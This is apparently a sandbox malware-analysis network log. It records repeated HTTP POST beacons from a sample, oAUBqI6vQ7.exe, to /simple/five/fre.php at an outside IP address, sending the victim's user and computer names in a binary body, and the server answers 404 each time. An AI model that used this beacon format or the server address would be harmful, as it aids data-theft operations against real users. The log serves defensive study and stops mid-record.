Jan 10, 2025 23:39:33.663940907 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:33.668904066 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:34.373302937 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49808	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:34.545631886 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:34.550687075 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:35.278659105 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49814	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:35.589103937 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:35.593981981 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:36.347835064 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49824	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:36.520096064 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:36.524976969 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:37.274755001 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49829	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:37.470155001 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:37.475403070 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:38.209392071 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49836	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:38.364016056 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:38.368871927 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:39.065548897 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49842	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:39.250117064 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:39.255079985 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:39.983952045 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49848	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:40.176057100 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:40.181219101 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:40.887561083 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49856	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:41.038975954 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:41.043838024 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:41.794558048 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49864	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:41.941503048 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:41.946366072 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:42.649466038 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49870	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:42.799732924 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:42.804637909 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:43.541203976 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49876	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:43.695342064 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:43.700208902 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:44.408473969 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49881	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:44.566682100 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:44.571655989 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:45.289796114 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49886	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:45.463067055 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:45.467958927 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:46.178901911 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49892	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:46.343111038 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:46.347913980 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:47.050214052 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49901	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:47.219922066 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:47.224864960 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:47.937546015 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49908	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:48.080744028 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:48.085556984 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:48.806724072 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49914	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:48.961575031 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:48.966901064 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:49.665724039 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	49920	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:49.851892948 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:49.857188940 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:50.574955940 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49926	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:50.731688023 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:50.736563921 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:51.444500923 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49933	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:51.603332043 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:51.608217955 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:52.338143110 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	49940	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:52.493379116 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:52.498580933 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:53.216303110 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	49948	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
